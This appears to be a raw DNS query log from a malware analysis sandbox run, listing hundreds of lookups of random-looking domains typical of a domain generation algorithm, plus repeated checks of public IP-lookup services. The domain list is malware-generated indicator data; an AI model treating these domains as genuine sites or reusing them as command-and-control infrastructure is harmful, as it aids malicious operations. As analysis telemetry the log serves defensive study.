                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:27.769813061 CEST192.168.11.301.1.1.10x47d1Standard query (0)delnmynibhnu.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:27.905535936 CEST192.168.11.301.1.1.10xf818Standard query (0)cgzmkaoqtpr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:28.071770906 CEST192.168.11.301.1.1.10x70e9Standard query (0)fakljq.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:28.240761042 CEST192.168.11.301.1.1.10xd960Standard query (0)yxeqglor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:28.375235081 CEST192.168.11.301.1.1.10x5aa5Standard query (0)ditidgffs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:28.464379072 CEST192.168.11.301.1.1.10x29afStandard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:28.543198109 CEST192.168.11.301.1.1.10x819Standard query (0)wsmpvwxb.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.205935001 CEST192.168.11.301.1.1.10x12d8Standard query (0)iogzpqtkbml.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.339679956 CEST192.168.11.301.1.1.10x97f1Standard query (0)hdtuhunof.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.473287106 CEST192.168.11.301.1.1.10x1cf1Standard query (0)habozmd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.608033895 CEST192.168.11.301.1.1.10xd122Standard query (0)umwqai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.773071051 CEST192.168.11.301.1.1.10x2618Standard query (0)sfhqxtpgdcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.906632900 CEST192.168.11.301.1.1.10xa45cStandard query (0)lkykrcllfknb.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:30.074577093 CEST192.168.11.301.1.1.10x2469Standard query (0)akzktct.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:30.210133076 CEST192.168.11.301.1.1.10x9a93Standard query (0)iewiai.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.446309090 CEST192.168.11.301.1.1.10x83bdStandard query (0)tqpudini.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.613446951 CEST192.168.11.301.1.1.10x1052Standard query (0)rusadzqvki.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.778007030 CEST192.168.11.301.1.1.10x3ce8Standard query (0)pqqobu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.944370031 CEST192.168.11.301.1.1.10x3101Standard query (0)jrqwzahcxma.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.129754066 CEST192.168.11.301.1.1.10xaf82Standard query (0)jexwxsd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.263114929 CEST192.168.11.301.1.1.10xf97Standard query (0)xofihfrimj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.432594061 CEST192.168.11.301.1.1.10x2097Standard query (0)qayaswom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.570344925 CEST192.168.11.301.1.1.10xb3faStandard query (0)jctcln.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.704999924 CEST192.168.11.301.1.1.10x94e8Standard query (0)iqiuqeui.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.885679007 CEST192.168.11.301.1.1.10xdfa3Standard query (0)mackgqecao.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.018577099 CEST192.168.11.301.1.1.10xa126Standard query (0)mgkssskeic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.186800957 CEST192.168.11.301.1.1.10xdd6fStandard query (0)ldziatjs.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.430341005 CEST192.168.11.301.1.1.10xa2d6Standard query (0)dekudc.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.627851009 CEST192.168.11.301.1.1.10x3c6bStandard query (0)cwbmhpaqjfw.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.792973995 CEST192.168.11.301.1.1.10xc5e1Standard query (0)yiiemy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.028609991 CEST192.168.11.301.1.1.10x1e4cStandard query (0)ccwsnub.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.161560059 CEST192.168.11.301.1.1.10x5073Standard query (0)sakmwmeuukis.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.295654058 CEST192.168.11.301.1.1.10x9e2Standard query (0)bnkqoxtw.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.465563059 CEST192.168.11.301.1.1.10xf3d6Standard query (0)mscaguoqykue.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.605437040 CEST192.168.11.301.1.1.10xd30fStandard query (0)qodrrrzehko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.737934113 CEST192.168.11.301.1.1.10xd144Standard query (0)oqiqgawygycg.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.837378025 CEST192.168.11.301.1.1.10x4dbcStandard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:36.871181965 CEST192.168.11.301.1.1.10x29e4Standard query (0)dyhkxxkggdd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:37.083707094 CEST192.168.11.301.1.1.10x35c3Standard query (0)quivwopczbfy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:37.221072912 CEST192.168.11.301.1.1.10x6de0Standard query (0)mmfljcduuiq.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:37.353149891 CEST192.168.11.301.1.1.10x3adaStandard query (0)nbbghscbn.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:37.534080982 CEST192.168.11.301.1.1.10xffb0Standard query (0)tkhcfkf.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:37.725290060 CEST192.168.11.301.1.1.10x193fStandard query (0)zfzerwlmxkg.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:37.864403009 CEST192.168.11.301.1.1.10x408cStandard query (0)cukqaeyggw.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:37.977880955 CEST192.168.11.301.1.1.10x9e10Standard query (0)www.whatismyip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:37.999958038 CEST192.168.11.301.1.1.10xaf9bStandard query (0)swnmtyjsf.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.131649971 CEST192.168.11.301.1.1.10x9128Standard query (0)bowmbsngr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.268506050 CEST192.168.11.301.1.1.10x4f46Standard query (0)kyhbvm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.450880051 CEST192.168.11.301.1.1.10x15fbStandard query (0)wofeuyik.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.583066940 CEST192.168.11.301.1.1.10x4fa6Standard query (0)qedsben.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.824426889 CEST192.168.11.301.1.1.10xb557Standard query (0)uqgtbor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.992537022 CEST192.168.11.301.1.1.10x69beStandard query (0)rqzbtyqilrby.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:39.213931084 CEST192.168.11.301.1.1.10x5d63Standard query (0)tmdlhcf.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:39.347270966 CEST192.168.11.301.1.1.10x5904Standard query (0)llymgadj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:39.486140966 CEST192.168.11.301.1.1.10x273bStandard query (0)strpoehe.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:39.623193979 CEST192.168.11.301.1.1.10xf88bStandard query (0)qhxaqmz.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:39.762003899 CEST192.168.11.301.1.1.10x7054Standard query (0)ptxmhgbxv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:39.930895090 CEST192.168.11.301.1.1.10x34ecStandard query (0)bsnmkqvxz.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.064742088 CEST192.168.11.301.1.1.10xbb60Standard query (0)ybgddyiuljpt.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.298084021 CEST192.168.11.301.1.1.10x614cStandard query (0)wooovgmc.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.432023048 CEST192.168.11.301.1.1.10x57deStandard query (0)pmblwd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.566133022 CEST192.168.11.301.1.1.10x3170Standard query (0)owfvaiicb.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.753295898 CEST192.168.11.301.1.1.10x5098Standard query (0)rdnmtqyabal.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.958858013 CEST192.168.11.301.1.1.10x61ccStandard query (0)cnzthi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.123764992 CEST192.168.11.301.1.1.10x2dcStandard query (0)ucrkhizrjle.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.261499882 CEST192.168.11.301.1.1.10x122bStandard query (0)lbrmhwh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.397197008 CEST192.168.11.301.1.1.10xa25dStandard query (0)aipoxmkfh.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.595206976 CEST192.168.11.301.1.1.10x15ecStandard query (0)pznkbhqy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.760750055 CEST192.168.11.301.1.1.10x5dcfStandard query (0)zytaxmwmimp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.948093891 CEST192.168.11.301.1.1.10xd4e5Standard query (0)nhblvtkhsosr.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.158763885 CEST192.168.11.301.1.1.10x8b2aStandard query (0)xuaibkgv.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.466414928 CEST192.168.11.301.1.1.10x13baStandard query (0)isagooiqeu.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.599704981 CEST192.168.11.301.1.1.10x127cStandard query (0)kapmdmvanjh.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.734457970 CEST192.168.11.301.1.1.10x40e0Standard query (0)iavgymgybax.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.867594004 CEST192.168.11.301.1.1.10xd8f8Standard query (0)bgzsdevk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.034259081 CEST192.168.11.301.1.1.10x4d4eStandard query (0)uweeaaosgi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.167839050 CEST192.168.11.301.1.1.10x4aeeStandard query (0)lsnsgqnhjek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.303669930 CEST192.168.11.301.1.1.10xbf34Standard query (0)fkfstwvpdih.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.439383984 CEST192.168.11.301.1.1.10xc28aStandard query (0)igkawu.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.620383024 CEST192.168.11.301.1.1.10x57e9Standard query (0)oqecuy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.752687931 CEST192.168.11.301.1.1.10x83fbStandard query (0)igpcvkvzb.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.887547016 CEST192.168.11.301.1.1.10x48f4Standard query (0)sopgmznouqlh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:44.054512978 CEST192.168.11.301.1.1.10x686Standard query (0)rihbjuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:44.190884113 CEST192.168.11.301.1.1.10x749aStandard query (0)vafwzud.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:44.335915089 CEST192.168.11.301.1.1.10x5d36Standard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:44.357505083 CEST192.168.11.301.1.1.10x3d0eStandard query (0)cyldvylo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:44.491775990 CEST192.168.11.301.1.1.10x7741Standard query (0)jwlihfftrqf.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:44.660141945 CEST192.168.11.301.1.1.10xc3aaStandard query (0)eqarlsfwjfba.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:44.795521975 CEST192.168.11.301.1.1.10x8242Standard query (0)mbrwiditjn.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:44.930398941 CEST192.168.11.301.1.1.10x4220Standard query (0)cceywm.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.162209034 CEST192.168.11.301.1.1.10x1853Standard query (0)zcdwpozkfvv.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.334391117 CEST192.168.11.301.1.1.10xfcd0Standard query (0)uuiwkq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.502665997 CEST192.168.11.301.1.1.10xad95Standard query (0)gwcisuuo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.639245987 CEST192.168.11.301.1.1.10x5ebdStandard query (0)amvrxrvzrwqn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.806818962 CEST192.168.11.301.1.1.10x9ffbStandard query (0)wlsgkd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.973702908 CEST192.168.11.301.1.1.10x8bedStandard query (0)ulfcsvuc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.108383894 CEST192.168.11.301.1.1.10xa445Standard query (0)hyloumvvua.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.241571903 CEST192.168.11.301.1.1.10x7735Standard query (0)yhonummhox.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.377475977 CEST192.168.11.301.1.1.10x21aStandard query (0)fexrcuretv.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.514941931 CEST192.168.11.301.1.1.10xa26eStandard query (0)hzsnry.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.695317984 CEST192.168.11.301.1.1.10xa44eStandard query (0)ffofvkbozxfp.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.829531908 CEST192.168.11.301.1.1.10x7468Standard query (0)mfxrrezr.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.974812984 CEST192.168.11.301.1.1.10x8a43Standard query (0)ftpehwlaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:50.145515919 CEST192.168.11.301.1.1.10x111fStandard query (0)muosqoie.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:50.769799948 CEST192.168.11.301.1.1.10xd9d4Standard query (0)www.imdb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:53.453795910 CEST192.168.11.301.1.1.10xbdd3Standard query (0)tawibizuloh.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:53.687098980 CEST192.168.11.301.1.1.10xcdacStandard query (0)uivmnckkpij.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:53.771187067 CEST192.168.11.301.1.1.10xd902Standard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:53.821186066 CEST192.168.11.301.1.1.10x3843Standard query (0)icdthcm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:53.954644918 CEST192.168.11.301.1.1.10xd6ffStandard query (0)xffltdug.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:54.087939978 CEST192.168.11.301.1.1.10x2d47Standard query (0)pomobah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:54.253166914 CEST192.168.11.301.1.1.10x1a3cStandard query (0)kwslgsua.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:54.385368109 CEST192.168.11.301.1.1.10x1619Standard query (0)neklmjvt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:54.553011894 CEST192.168.11.301.1.1.10x2388Standard query (0)eyngxwxvv.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:54.688724041 CEST192.168.11.301.1.1.10x1305Standard query (0)kiooigv.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:54.820857048 CEST192.168.11.301.1.1.10xc9bStandard query (0)ngtlglf.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.048594952 CEST192.168.11.301.1.1.10xc709Standard query (0)bsvkxs.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.215699911 CEST192.168.11.301.1.1.10x1fedStandard query (0)xmvcfdcsymv.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.396856070 CEST192.168.11.301.1.1.10x1384Standard query (0)jqxkxrg.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.575463057 CEST192.168.11.301.1.1.10x9c87Standard query (0)dwpqgivmpx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.742520094 CEST192.168.11.301.1.1.10x9dcaStandard query (0)blygpfuqsf.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.949686050 CEST192.168.11.301.1.1.10x1b95Standard query (0)kscoccomsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.083051920 CEST192.168.11.301.1.1.10x6e91Standard query (0)onlmeofrwh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.216909885 CEST192.168.11.301.1.1.10xde12Standard query (0)lzemrstoe.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.519056082 CEST192.168.11.301.1.1.10x9d49Standard query (0)buzxzusv.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.658297062 CEST192.168.11.301.1.1.10xfc06Standard query (0)txflaunynf.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.790200949 CEST192.168.11.301.1.1.10x5c46Standard query (0)dekwdrys.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.923935890 CEST192.168.11.301.1.1.10x9c4eStandard query (0)pfzvtdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:57.058650970 CEST192.168.11.301.1.1.10x9e05Standard query (0)gsdusg.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:57.271853924 CEST192.168.11.301.1.1.10xb423Standard query (0)nmubfz.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:57.405524015 CEST192.168.11.301.1.1.10x1144Standard query (0)gurklthyhkv.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:57.551872969 CEST192.168.11.301.1.1.10x4d39Standard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:57.572380066 CEST192.168.11.301.1.1.10x8cb0Standard query (0)zuxymd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:57.779550076 CEST192.168.11.301.1.1.10xad88Standard query (0)ygqeguwiogqi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:57.914220095 CEST192.168.11.301.1.1.10x7ffbStandard query (0)kqpsemrav.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:58.112750053 CEST192.168.11.301.1.1.10x2221Standard query (0)aqwogctkcig.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:58.280780077 CEST192.168.11.301.1.1.10x4b61Standard query (0)lhlsksy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:58.466389894 CEST192.168.11.301.1.1.10x85e9Standard query (0)mimmqwaykqia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:58.647207022 CEST192.168.11.301.1.1.10xec04Standard query (0)scpzbmxklu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:58.709202051 CEST192.168.11.301.1.1.10xf3d7Standard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:58.780714035 CEST192.168.11.301.1.1.10xe826Standard query (0)emrmaigh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:58.915333986 CEST192.168.11.301.1.1.10x1b26Standard query (0)mhposkbsmfgm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.052649975 CEST192.168.11.301.1.1.10x66Standard query (0)msrrjwyrm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.260301113 CEST192.168.11.301.1.1.10x6d6eStandard query (0)evftriicx.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.563123941 CEST192.168.11.301.1.1.10x7edaStandard query (0)yqwmiy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.731981039 CEST192.168.11.301.1.1.10x8d42Standard query (0)kgsysa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.867403984 CEST192.168.11.301.1.1.10x6ecbStandard query (0)rreezoiqbg.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.004115105 CEST192.168.11.301.1.1.10xe221Standard query (0)wkzfaedg.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.188419104 CEST192.168.11.301.1.1.10x49cfStandard query (0)dkxmvos.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.323312044 CEST192.168.11.301.1.1.10xc715Standard query (0)tqfbxlwpvsip.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.524643898 CEST192.168.11.301.1.1.10x6966Standard query (0)koindl.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.661382914 CEST192.168.11.301.1.1.10xa2f8Standard query (0)yumqcygsqk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.828836918 CEST192.168.11.301.1.1.10xa6cfStandard query (0)vopsaqf.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:01.010289907 CEST192.168.11.301.1.1.10x2833Standard query (0)cobmtgsmfpx.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:01.248405933 CEST192.168.11.301.1.1.10x335fStandard query (0)qemkas.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:01.485439062 CEST192.168.11.301.1.1.10x7db7Standard query (0)bqtaiujbh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:01.627218962 CEST192.168.11.301.1.1.10xb388Standard query (0)swswoussmc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:01.763695002 CEST192.168.11.301.1.1.10x80cStandard query (0)lkqdmkckr.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:01.901222944 CEST192.168.11.301.1.1.10xb415Standard query (0)pmbixadyny.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:02.068640947 CEST192.168.11.301.1.1.10x4c7fStandard query (0)mmvcfomuzgr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:02.202337980 CEST192.168.11.301.1.1.10x209fStandard query (0)dcbeeq.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:02.347054958 CEST192.168.11.301.1.1.10xce2eStandard query (0)zjkdtmzuul.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:02.483568907 CEST192.168.11.301.1.1.10x3d4bStandard query (0)sizbtf.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:02.790452003 CEST192.168.11.301.1.1.10xb948Standard query (0)ksqlfmrx.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:02.988261938 CEST192.168.11.301.1.1.10x4576Standard query (0)hlrqvyg.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.158591032 CEST192.168.11.301.1.1.10xd0fdStandard query (0)zohogepxhih.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.394155025 CEST192.168.11.301.1.1.10x689cStandard query (0)trpwlxg.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.692405939 CEST192.168.11.301.1.1.10x71d6Standard query (0)qbhdsh.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.990890026 CEST192.168.11.301.1.1.10xa731Standard query (0)wxxacjxlvl.infoA (IP address)IN (0x0001)false
